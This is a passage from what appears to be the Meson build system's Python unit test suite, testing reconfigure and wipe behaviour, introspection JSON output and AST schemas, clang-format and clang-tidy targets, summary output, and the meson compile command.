    @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
    def test_pkg_config_libdir(self):
        '''
        Test the pkg_config_libdir cross-file property: host dependencies
        search the configured libdir while native dependencies honour
        PKG_CONFIG_LIBDIR from the environment.
        '''
        testdir = os.path.join(self.unit_test_dir,
                               '46 native dep pkgconfig var')
        with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
            crossfile.write(textwrap.dedent(
                '''[binaries]
                pkgconfig = 'pkg-config'

                [properties]
                pkg_config_libdir = ['{}']

                [host_machine]
                system = 'linux'
                cpu_family = 'arm'
                cpu = 'armv7'
                endian = 'little'
                '''.format(os.path.join(testdir, 'cross_pkgconfig'))))
            crossfile.flush()
            self.meson_cross_file = crossfile.name

        env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
                                                 'native_pkgconfig')}
        self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
        self.wipe()
        self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
    """Rewrite coredata.dat with a different version stamp.

    With change_minor=False an old version ('0.47.0') is written, which the
    next configure treats as a reconfigure-from-scratch trigger; with
    change_minor=True only the third version component is bumped by one.
    """
    coredata_file = os.path.join(self.privatedir, 'coredata.dat')
    with open(coredata_file, 'rb') as handle:
        coredata = pickle.load(handle)
    if change_minor:
        major, minor, patch = mesonbuild.coredata.version.split('.')[0:3]
        coredata.version = '.'.join([major, minor, str(int(patch) + 1)])
    else:
        # Anything older than the running version forces a full regeneration.
        coredata.version = '0.47.0'
    with open(coredata_file, 'wb') as handle:
        pickle.dump(coredata, handle)
def test_reconfigure(self):
    """--reconfigure after a version downgrade regenerates from scratch,
    preserving previously set options; --wipe additionally cleans builddir."""
    testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
    self.init(testdir, extra_args=['-Dopt1=val1', '-Dsub1:werror=true'])
    self.setconf('-Dopt2=val2')
    self.__reconfigure()

    out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
    for pattern in ('Regenerating configuration from scratch',
                    'opt1 val1', 'opt2 val2', 'opt3 val3',
                    'opt4 default4', 'sub1:werror True'):
        self.assertRegex(out, pattern)
    self.build()
    self.run_tests()

    # Create a file in builddir and verify wipe command removes it
    marker = os.path.join(self.builddir, 'something')
    open(marker, 'w').close()
    self.assertTrue(os.path.exists(marker))
    out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
    self.assertFalse(os.path.exists(marker))
    for pattern in ('opt1 val1', 'opt2 val2', 'opt3 val3',
                    'opt4 val4', 'sub1:werror True'):
        self.assertRegex(out, pattern)
    self.assertTrue(Path(self.builddir, '.gitignore').exists())
    self.build()
    self.run_tests()
def test_wipe_from_builddir(self):
    """--wipe must work when meson is invoked from inside the build directory.

    Bug fix: the original used ``with Path(self.builddir):`` which never
    changed the working directory — pathlib.Path's context-manager protocol
    was a no-op for this purpose (deprecated in 3.11, removed in 3.13), so
    the wipe was actually run from the original cwd.  Use an explicit
    os.chdir with try/finally instead.
    """
    testdir = os.path.join(self.common_test_dir, '157 custom target subdir depend files')
    self.init(testdir)
    self.__reconfigure()
    prev_cwd = os.getcwd()
    try:
        os.chdir(self.builddir)
        self.init(testdir, extra_args=['--wipe'])
    finally:
        # Always restore cwd so later tests are unaffected.
        os.chdir(prev_cwd)
def test_minor_version_does_not_reconfigure_wipe(self):
    """A patch-level version bump must NOT trigger a from-scratch regeneration."""
    testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
    self.init(testdir, extra_args=['-Dopt1=val1'])
    self.setconf('-Dopt2=val2')
    self.__reconfigure(change_minor=True)

    out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
    self.assertNotRegex(out, 'Regenerating configuration from scratch')
    # All options, old and new, survive the in-place reconfigure.
    for pattern in ('opt1 val1', 'opt2 val2', 'opt3 val3', 'opt4 default4'):
        self.assertRegex(out, pattern)
    self.build()
    self.run_tests()
def test_target_construct_id_from_path(self):
    """Target IDs derived from paths are stable across releases.

    The IDs are stable but not guessable; this guards against unintentional
    changes to the ID generation scheme.
    """
    cases = [
        (('some/obscure/subdir', 'target-id', '@suffix'),
         '5e002d3@@target-id@suffix'),
        (('subproject/foo/subdir/bar', 'target2-id', '@other'),
         '81d46d1@@target2-id@other'),
    ]
    for args, expected in cases:
        self.assertEqual(expected, Target.construct_id_from_path(*args))
def test_introspect_projectinfo_without_configured_build(self):
    """--projectinfo on a bare meson.build (no configured builddir) reports
    project metadata, options files and subprojects."""
    def project_info(case):
        build_file = os.path.join(self.common_test_dir, case, 'meson.build')
        return self.introspect_directory(build_file, '--projectinfo')

    # Two simple projects without subprojects.
    for case, files, name in (
            ('33 run program', {'meson.build'}, 'run command'),
            ('40 options', {'meson_options.txt', 'meson.build'}, 'options')):
        res = project_info(case)
        self.assertEqual(set(res['buildsystem_files']), files)
        self.assertEqual(res['version'], 'undefined')
        self.assertEqual(res['descriptive_name'], name)
        self.assertEqual(res['subprojects'], [])

    # A project carrying exactly one subproject.
    res = project_info('43 subproject options')
    self.assertEqual(set(res['buildsystem_files']), {'meson_options.txt', 'meson.build'})
    self.assertEqual(res['version'], 'undefined')
    self.assertEqual(res['descriptive_name'], 'suboptions')
    self.assertEqual(len(res['subprojects']), 1)
    subproject_files = {f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files']}
    self.assertEqual(subproject_files, {'subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build'})
    self.assertEqual(res['subprojects'][0]['name'], 'subproject')
    self.assertEqual(res['subprojects'][0]['version'], 'undefined')
    self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
    """--projectinfo on a configured build lists all (transitive) subprojects."""
    testdir = os.path.join(self.common_test_dir, '98 subproject subdir')
    self.init(testdir)
    res = self.introspect('--projectinfo')
    expected = {
        'descriptive_name': 'proj',
        'version': 'undefined',
        'subproject_dir': 'subprojects',
        'subprojects': [
            # (descriptive_name, name, version) per subproject, sorted by name.
            {'descriptive_name': desc, 'name': name, 'version': ver}
            for desc, name, ver in [
                ('sub', 'sub', '1.0'),
                ('sub_implicit', 'sub_implicit', '1.0'),
                ('sub-novar', 'sub_novar', '1.0'),
                ('subsub', 'subsub', 'undefined'),
                ('subsubsub', 'subsubsub', 'undefined'),
            ]
        ],
    }
    # Introspection order is not guaranteed; normalise before comparing.
    res['subprojects'] = sorted(res['subprojects'], key=lambda sp: sp['name'])
    self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
    """Each target reports the subproject it was defined in (None for the
    main project)."""
    testdir = os.path.join(self.common_test_dir, '42 subproject')
    self.init(testdir)
    expected_subproject = {
        'sublib': 'sublib',
        'simpletest': 'sublib',
        'user': None,
    }
    for target in self.introspect('--targets'):
        self.assertEqual(target['subproject'],
                         expected_subproject[target['name']])
def test_introspect_projectinfo_subproject_dir(self):
    """--projectinfo reflects a custom subproject_dir after configuring."""
    self.init(os.path.join(self.common_test_dir, '75 custom subproject dir'))
    info = self.introspect('--projectinfo')
    self.assertEqual(info['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
    """A custom subproject_dir is reported even without a configured build."""
    build_file = os.path.join(self.common_test_dir, '75 custom subproject dir', 'meson.build')
    info = self.introspect_directory(build_file, '--projectinfo')
    self.assertEqual(info['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
    """The clang-format target rewrites both source and header to the
    expected formatting.

    Bug fix: after running the target, only the header was verified against
    its expected copy; the C source (whose good/bad fixtures are set up
    above) was never checked.  Assert both now.
    """
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest(f'Clang-format is for now only supported on Ninja, not {self.backend.name}')
    testdir = os.path.join(self.unit_test_dir, '54 clang-format')
    testfile = os.path.join(testdir, 'prog.c')
    badfile = os.path.join(testdir, 'prog_orig_c')
    goodfile = os.path.join(testdir, 'prog_expected_c')
    testheader = os.path.join(testdir, 'header.h')
    badheader = os.path.join(testdir, 'header_orig_h')
    goodheader = os.path.join(testdir, 'header_expected_h')
    try:
        # Seed the build with the unformatted copies.
        shutil.copyfile(badfile, testfile)
        shutil.copyfile(badheader, testheader)
        self.init(testdir)
        self.assertNotEqual(Path(testfile).read_text(),
                            Path(goodfile).read_text())
        self.assertNotEqual(Path(testheader).read_text(),
                            Path(goodheader).read_text())
        self.run_target('clang-format')
        # Verify the C source as well, not just the header.
        self.assertEqual(Path(testfile).read_text(),
                         Path(goodfile).read_text())
        self.assertEqual(Path(testheader).read_text(),
                         Path(goodheader).read_text())
    finally:
        # Never leave the scratch copies behind in the source tree.
        if os.path.exists(testfile):
            os.unlink(testfile)
        if os.path.exists(testheader):
            os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
    """The clang-tidy target flags the known diagnostic but does not touch
    the decoy 'dummydir.h' path."""
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest(f'Clang-tidy is for now only supported on Ninja, not {self.backend.name}')
    if shutil.which('c++') is None:
        raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
    if is_osx():
        raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
    testdir = os.path.join(self.unit_test_dir, '69 clang-tidy')
    dummydir = os.path.join(testdir, 'dummydir.h')
    self.init(testdir, override_envvars={'CXX': 'c++'})
    output = self.run_target('clang-tidy')
    self.assertIn('cttest.cpp:4:20', output)
    self.assertNotIn(dummydir, output)
def test_identity_cross(self):
    """A cross file whose host machine equals the build machine must still
    be treated as a cross build."""
    testdir = os.path.join(self.unit_test_dir, '70 cross')
    # First configure generates a cross file describing this very machine.
    self.init(testdir, extra_args=['-Dgenerate=true'])
    self.meson_cross_file = os.path.join(self.builddir, "crossfile")
    self.assertTrue(os.path.exists(self.meson_cross_file))
    # Configuring a fresh builddir with that file must be detected as cross.
    self.new_builddir()
    self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
    """Build options introspected from source match those of a configured build."""
    testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
    from_source = self.introspect_directory(
        os.path.join(testdir, 'meson.build'), ['--buildoptions'] + self.meson_args)
    self.init(testdir, default_args=False)
    from_build = self.introspect('--buildoptions')
    self.maxDiff = None
    # XXX: These now generate in a different order, is that okay?
    def by_name(opt):
        return opt['name']
    self.assertListEqual(sorted(from_source, key=by_name),
                         sorted(from_build, key=by_name))
def test_meson_configure_from_source_does_not_crash(self):
    """`meson configure <srcdir>` on an unconfigured source tree must not crash."""
    srcdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
    self._run(self.mconf_command + [srcdir])
def test_introspect_buildoptions_cross_only(self):
    """A cross-only project exposes host options but no build.* counterparts."""
    build_file = os.path.join(self.unit_test_dir, '83 cross only introspect', 'meson.build')
    options = self.introspect_directory(build_file, ['--buildoptions'] + self.meson_args)
    names = {opt['name'] for opt in options}
    self.assertIn('c_args', names)
    self.assertNotIn('build.c_args', names)
def test_introspect_json_flat(self):
    """With -Dlayout=flat every target output lands under meson-out/.

    Fixes two defects: the loop variable shadowed the ``out`` holding the
    init() output, and a bare ``assert`` statement is silently stripped when
    Python runs with -O — use a real unittest assertion instead.
    """
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    self.init(testdir, extra_args=['-Dlayout=flat'])
    infodir = os.path.join(self.builddir, 'meson-info')
    self.assertPathExists(infodir)
    with open(os.path.join(infodir, 'intro-targets.json')) as fp:
        targets = json.load(fp)
    for target in targets:
        for fname in target['filename']:
            self.assertTrue(
                os.path.relpath(fname, self.builddir).startswith('meson-out'),
                msg=f'{fname} is not under meson-out')
def test_introspect_json_dump(self):
    """Schema-check every intro-*.json file written to meson-info/.

    Configures the '57 introspection' test project, loads each of the
    introspection files, validates key names and value types against the
    expected schemas below, and spot-checks selected content (tests,
    options, dependencies, project info, targets).
    """
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    self.init(testdir)
    infodir = os.path.join(self.builddir, 'meson-info')
    self.assertPathExists(infodir)
    def assertKeyTypes(key_type_list, obj, strict: bool = True):
        # Validate each (key, expected-type) pair against obj.  A None in a
        # type tuple marks the key as optional/nullable; with strict=True,
        # keys absent from key_type_list are rejected.
        for i in key_type_list:
            if isinstance(i[1], (list, tuple)) and None in i[1]:
                i = (i[0], tuple([x for x in i[1] if x is not None]))
                if i[0] not in obj or obj[i[0]] is None:
                    continue
            self.assertIn(i[0], obj)
            self.assertIsInstance(obj[i[0]], i[1])
        if strict:
            for k in obj.keys():
                found = False
                for i in key_type_list:
                    if k == i[0]:
                        found = True
                        break
                self.assertTrue(found, f'Key "{k}" not in expected list')
    # Expected top-level files and their JSON types.
    root_keylist = [
        ('benchmarks', list),
        ('buildoptions', list),
        ('buildsystem_files', list),
        ('dependencies', list),
        ('installed', dict),
        ('projectinfo', dict),
        ('targets', list),
        ('tests', list),
    ]
    # Schema for one test/benchmark entry.
    test_keylist = [
        ('cmd', list),
        ('env', dict),
        ('name', str),
        ('timeout', int),
        ('suite', list),
        ('is_parallel', bool),
        ('protocol', str),
        ('depends', list),
        ('workdir', (str, None)),
        ('priority', int),
    ]
    # Schema for one build option entry.
    buildoptions_keylist = [
        ('name', str),
        ('section', str),
        ('type', str),
        ('description', str),
        ('machine', str),
        ('choices', (list, None)),
        ('value', (str, int, bool, list)),
    ]
    # Per option type: (type name, python type of 'value', extra keys).
    buildoptions_typelist = [
        ('combo', str, [('choices', list)]),
        ('string', str, []),
        ('boolean', bool, []),
        ('integer', int, []),
        ('array', list, []),
    ]
    buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
    buildoptions_machines = ['any', 'build', 'host']
    # Schema for one dependency entry.
    dependencies_typelist = [
        ('name', str),
        ('version', str),
        ('compile_args', list),
        ('link_args', list),
    ]
    # Schema for one target entry.
    targets_typelist = [
        ('name', str),
        ('id', str),
        ('type', str),
        ('defined_in', str),
        ('filename', list),
        ('build_by_default', bool),
        ('target_sources', list),
        ('extra_files', list),
        ('subproject', (str, None)),
        ('install_filename', (list, None)),
        ('installed', bool),
    ]
    # Schema for one source group inside a target.
    targets_sources_typelist = [
        ('language', str),
        ('compiler', list),
        ('parameters', list),
        ('sources', list),
        ('generated_sources', list),
    ]
    # First load all files
    res = {}
    for i in root_keylist:
        curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
        self.assertPathExists(curr)
        with open(curr) as fp:
            res[i[0]] = json.load(fp)
    assertKeyTypes(root_keylist, res)
    # Match target ids to input and output files for ease of reference
    src_to_id = {}
    out_to_id = {}
    name_to_out = {}
    for i in res['targets']:
        # Debug aid: json.dump writes the target to stdout and returns
        # None, so this also prints a stray 'None' line.
        print(json.dump(i, sys.stdout))
        out_to_id.update({os.path.relpath(out, self.builddir): i['id']
                          for out in i['filename']})
        name_to_out.update({i['name']: i['filename']})
        for group in i['target_sources']:
            src_to_id.update({os.path.relpath(src, testdir): i['id']
                              for src in group['sources']})
    # Check Tests and benchmarks
    tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
    # Expected 'depends' target ids per test, resolved via the maps above.
    deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
                    'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
                    'benchmark 1': [out_to_id['file2'], out_to_id['file3'], out_to_id['file4'], src_to_id['t3.cpp']]}
    for i in res['benchmarks'] + res['tests']:
        assertKeyTypes(test_keylist, i)
        if i['name'] in tests_to_find:
            tests_to_find.remove(i['name'])
        self.assertEqual(sorted(i['depends']),
                         sorted(deps_to_find[i['name']]))
    self.assertListEqual(tests_to_find, [])
    # Check buildoptions
    buildopts_to_find = {'cpp_std': 'c++11'}
    for i in res['buildoptions']:
        assertKeyTypes(buildoptions_keylist, i)
        valid_type = False
        for j in buildoptions_typelist:
            if i['type'] == j[0]:
                self.assertIsInstance(i['value'], j[1])
                assertKeyTypes(j[2], i, strict=False)
                valid_type = True
                break
        self.assertIn(i['section'], buildoptions_sections)
        self.assertIn(i['machine'], buildoptions_machines)
        self.assertTrue(valid_type)
        if i['name'] in buildopts_to_find:
            self.assertEqual(i['value'], buildopts_to_find[i['name']])
            buildopts_to_find.pop(i['name'], None)
    self.assertDictEqual(buildopts_to_find, {})
    # Check buildsystem_files
    bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
    bs_files = [os.path.join(testdir, x) for x in bs_files]
    self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
    # Check dependencies
    dependencies_to_find = ['threads']
    for i in res['dependencies']:
        assertKeyTypes(dependencies_typelist, i)
        if i['name'] in dependencies_to_find:
            dependencies_to_find.remove(i['name'])
    self.assertListEqual(dependencies_to_find, [])
    # Check projectinfo
    self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
    # Check targets
    # Expected per target: (type, build_by_default, installed, defined_in, sources).
    targets_to_find = {
        'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build',
                          [os.path.join(testdir, 'sharedlib', 'shared.cpp')]),
        'staticTestLib': ('static library', True, False, 'staticlib/meson.build',
                          [os.path.join(testdir, 'staticlib', 'static.c')]),
        'custom target test 1': ('custom', False, False, 'meson.build',
                                 [os.path.join(testdir, 'cp.py')]),
        'custom target test 2': ('custom', False, False, 'meson.build',
                                 name_to_out['custom target test 1']),
        'test1': ('executable', True, True, 'meson.build',
                  [os.path.join(testdir, 't1.cpp')]),
        'test2': ('executable', True, False, 'meson.build',
                  [os.path.join(testdir, 't2.cpp')]),
        'test3': ('executable', True, False, 'meson.build',
                  [os.path.join(testdir, 't3.cpp')]),
        'custom target test 3': ('custom', False, False, 'meson.build',
                                 name_to_out['test3']),
    }
    for i in res['targets']:
        assertKeyTypes(targets_typelist, i)
        if i['name'] in targets_to_find:
            tgt = targets_to_find[i['name']]
            self.assertEqual(i['type'], tgt[0])
            self.assertEqual(i['build_by_default'], tgt[1])
            self.assertEqual(i['installed'], tgt[2])
            self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
            targets_to_find.pop(i['name'], None)
        for j in i['target_sources']:
            assertKeyTypes(targets_sources_typelist, j)
            # NOTE(review): `tgt` here is whatever binding the enclosing
            # `if` last left; this relies on every introspected target
            # matching the expected table before its sources are checked —
            # confirm against the fixture layout.
            self.assertEqual(j['sources'], [os.path.normpath(f) for f in tgt[4]])
    self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
    """`introspect --all` must equal the union of the per-file intro-*.json dumps."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    self.init(testdir)
    res_all = self.introspect('--all')
    infodir = os.path.join(self.builddir, 'meson-info')
    self.assertPathExists(infodir)
    sections = (
        'benchmarks',
        'buildoptions',
        'buildsystem_files',
        'dependencies',
        'installed',
        'projectinfo',
        'targets',
        'tests',
    )
    res_file = {}
    for section in sections:
        path = os.path.join(infodir, f'intro-{section}.json')
        self.assertPathExists(path)
        with open(path) as fp:
            res_file[section] = json.load(fp)
    self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
    """meson-info.json carries the expected top-level keys and a clean status."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile) as fp:
        info = json.load(fp)
    for key in ('meson_version', 'directories', 'introspection',
                'build_files_updated', 'error'):
        self.assertIn(key, info)
    self.assertEqual(info['error'], False)
    self.assertEqual(info['build_files_updated'], True)
def test_introspect_config_update(self):
    """intro-buildoptions.json is rewritten by setconf to reflect new values."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile) as fp:
        res1 = json.load(fp)
    # Patch the loaded snapshot to what setconf below should produce
    # (buildtype=release implies optimization '3' and debug False).
    updates = {
        'cpp_std': 'c++14',
        'build.cpp_std': 'c++14',
        'buildtype': 'release',
        'optimization': '3',
        'debug': False,
    }
    for opt in res1:
        if opt['name'] in updates:
            opt['value'] = updates[opt['name']]
    self.setconf('-Dcpp_std=c++14')
    self.setconf('-Dbuildtype=release')
    with open(introfile) as fp:
        res2 = json.load(fp)
    self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
    """Targets introspected from source match those of a configured build,
    modulo differences the source scanner cannot know."""
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    testfile = os.path.join(testdir, 'meson.build')
    introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
    self.init(testdir)
    self.assertPathExists(introfile)
    with open(introfile) as fp:
        res_wb = json.load(fp)
    res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
    # The from-source scanner cannot see custom targets, absolute output
    # paths, install filenames or per-language source groups; normalise the
    # configured-build result down to the same shape before comparing.
    res_wb = [tgt for tgt in res_wb if tgt['type'] != 'custom']
    for tgt in res_wb:
        tgt['filename'] = [os.path.relpath(fname, self.builddir)
                           for fname in tgt['filename']]
        tgt.pop('install_filename', None)
        flat_sources = [src for group in tgt['target_sources']
                        for src in group['sources']]
        tgt['target_sources'] = [{
            'language': 'unknown',
            'compiler': [],
            'parameters': [],
            'sources': flat_sources,
            'generated_sources': []
        }]
    self.maxDiff = None
    self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
    """Validate the JSON AST produced by `introspect --ast` on a meson.build.

    Every node must carry location fields and the per-node-type fields
    listed in the *nodes* schema below; selected node counts are also
    spot-checked against the fixture.
    """
    testdir = os.path.join(self.unit_test_dir, '57 introspection')
    testfile = os.path.join(testdir, 'meson.build')
    res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
    # Tally of how often each node type was visited.
    node_counter = {}
    def accept_node(json_node):
        # Recursively validate a single AST node dict.
        self.assertIsInstance(json_node, dict)
        for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
            self.assertIn(i, json_node)
            self.assertIsInstance(json_node[i], int)
        self.assertIn('node', json_node)
        n = json_node['node']
        self.assertIsInstance(n, str)
        self.assertIn(n, nodes)
        if n not in node_counter:
            node_counter[n] = 0
        node_counter[n] = node_counter[n] + 1
        # Validate each expected field with its validator, or by plain
        # type check when the validator slot is None.
        for nodeDesc in nodes[n]:
            key = nodeDesc[0]
            func = nodeDesc[1]
            self.assertIn(key, json_node)
            if func is None:
                tp = nodeDesc[2]
                self.assertIsInstance(json_node[key], tp)
                continue
            func(json_node[key])
    def accept_node_list(node_list):
        # A field holding a list of child nodes.
        self.assertIsInstance(node_list, list)
        for i in node_list:
            accept_node(i)
    def accept_kwargs(kwargs):
        # A field holding keyword arguments as [{'key': node, 'val': node}].
        self.assertIsInstance(kwargs, list)
        for i in kwargs:
            self.assertIn('key', i)
            self.assertIn('val', i)
            accept_node(i['key'])
            accept_node(i['val'])
    # Schema: node type -> [(field, validator)] or [(field, None, type)].
    nodes = {
        'BooleanNode': [('value', None, bool)],
        'IdNode': [('value', None, str)],
        'NumberNode': [('value', None, int)],
        'StringNode': [('value', None, str)],
        'ContinueNode': [],
        'BreakNode': [],
        'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
        'ArrayNode': [('args', accept_node)],
        'DictNode': [('args', accept_node)],
        'EmptyNode': [],
        'OrNode': [('left', accept_node), ('right', accept_node)],
        'AndNode': [('left', accept_node), ('right', accept_node)],
        'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
        'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
        'NotNode': [('right', accept_node)],
        'CodeBlockNode': [('lines', accept_node_list)],
        'IndexNode': [('object', accept_node), ('index', accept_node)],
        'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
        'FunctionNode': [('args', accept_node), ('name', None, str)],
        'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
        'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
        'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
        'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
        'IfNode': [('condition', accept_node), ('block', accept_node)],
        'UMinusNode': [('right', accept_node)],
        'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
    }
    accept_node(res_nb)
    # Spot-check that the fixture's control-flow statements were all seen.
    for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
        self.assertIn(n, node_counter)
        self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
    """--scan-dependencies finds every dependency() call in meson.build,
    including conditional ones and those with fallbacks."""
    testfile = os.path.join(self.unit_test_dir, '57 introspection', 'meson.build')
    res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)

    def dep(name, required, version, has_fallback, conditional):
        # Shape of a single scanner result entry.
        return {'name': name,
                'required': required,
                'version': version,
                'has_fallback': has_fallback,
                'conditional': conditional}

    expected = [
        dep('threads', True, [], False, False),
        dep('zlib', False, [], False, False),
        dep('bugDep1', True, [], False, False),
        dep('somethingthatdoesnotexist', True, ['>=1.2.3'], False, True),
        dep('look_i_have_a_fallback', True, ['>=1.0.0', '<=99.9.9'], True, True),
    ]
    self.maxDiff = None
    self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
    """`meson unstable-coredata` must run without raising on a trivial project."""
    self.init(os.path.join(self.common_test_dir, '1 trivial'))
    # Only checks the command exits cleanly; its output is unstable by design.
    self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
    """Dependencies are found through the cmake_prefix_path builtin option."""
    testdir = os.path.join(self.unit_test_dir, '63 cmake_prefix_path')
    prefix = os.path.join(testdir, 'prefix')
    self.init(testdir, extra_args=['-Dcmake_prefix_path=' + prefix])
@skip_if_no_cmake
def test_cmake_parser(self):
    """The CMake package-file parser handles the fixture's config files."""
    testdir = os.path.join(self.unit_test_dir, '64 cmake parser')
    prefix = os.path.join(testdir, 'prefix')
    self.init(testdir, extra_args=['-Dcmake_prefix_path=' + prefix])
def test_alias_target(self):
    """alias_target outputs are built only when the alias itself is invoked."""
    if self.backend is Backend.vs:
        # FIXME: This unit test is broken with vs backend, needs investigation
        raise unittest.SkipTest(f'Skipping alias_target test with {self.backend.name} backend')
    testdir = os.path.join(self.unit_test_dir, '65 alias target')
    self.init(testdir)
    self.build()
    artifacts = ['prog' + exe_suffix, 'hello.txt']
    # A default build must not produce the alias' dependencies...
    for artifact in artifacts:
        self.assertPathDoesNotExist(os.path.join(self.builddir, artifact))
    # ...but explicitly building the alias must.
    self.run_target('build-all')
    for artifact in artifacts:
        self.assertPathExists(os.path.join(self.builddir, artifact))
def test_configure(self):
    """`meson configure <builddir>` succeeds on a configured C++ project."""
    self.init(os.path.join(self.common_test_dir, '2 cpp'))
    self._run(self.mconf_command + [self.builddir])
def test_summary(self):
    # Compare the configure-time summary() output of the '72 summary'
    # project against the expected text, line by line.
    testdir = os.path.join(self.unit_test_dir, '72 summary')
    out = self.init(testdir)
    # NOTE(review): the exact alignment/indentation inside this expected
    # block must byte-match meson's summary formatting (keys padded to the
    # widest key per section) — confirm against a live run.
    expected = textwrap.dedent(r'''
        Some Subproject 2.0
            string : bar
            integer: 1
            boolean: True
        My Project 1.0
          Configuration
            Some boolean   : False
            Another boolean: True
            Some string    : Hello World
            A list         : string
                             1
                             True
            empty list     :
            enabled_opt    : enabled
            A number       : 1
            yes            : YES
            no             : NO
            coma list      : a, b, c
          Stuff
            missing prog   : NO
            existing prog  : ''' + sys.executable + '''
            missing dep    : NO
            internal dep   : YES
          Plugins
            long coma list : alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
                             autodetect, avi
          Subprojects
            sub            : YES
            sub2           : NO Problem encountered: This subproject failed
        ''')
    # Drop the leading blank line, locate the summary inside the full
    # configure output, and compare the same number of lines.
    expected_lines = expected.split('\n')[1:]
    out_start = out.find(expected_lines[0])
    out_lines = out[out_start:].split('\n')[:len(expected_lines)]
    if sys.version_info < (3, 7, 0):
        # Dictionary order is not stable in Python <3.7, so sort the lines
        # while comparing
        self.assertEqual(sorted(expected_lines), sorted(out_lines))
    else:
        self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
    """Test the meson compile command.

    Covers: the bare build, --clean, selecting targets by name and
    name:type, disambiguating duplicate names via relative path, building a
    run_target, and passing backend-specific arguments through
    --ninja-args / --vs-args.
    """
    def get_exe_name(basename: str) -> str:
        # Platform-dependent executable file name.
        if is_windows():
            return f'{basename}.exe'
        else:
            return basename
    def get_shared_lib_name(basename: str) -> str:
        # Platform-dependent shared-library file name.
        if mesonbuild.environment.detect_msys2_arch():
            return f'lib{basename}.dll'
        elif is_windows():
            return f'{basename}.dll'
        elif is_cygwin():
            return f'cyg{basename}.dll'
        elif is_osx():
            return f'lib{basename}.dylib'
        else:
            return f'lib{basename}.so'
    def get_static_lib_name(basename: str) -> str:
        return f'lib{basename}.a'
    # Base case (no targets or additional arguments)
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    self.init(testdir)
    self._run([*self.meson_command, 'compile', '-C', self.builddir])
    self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
    # `--clean`
    self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
    self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
    # Target specified in a project with unique names
    testdir = os.path.join(self.common_test_dir, '6 linkshared')
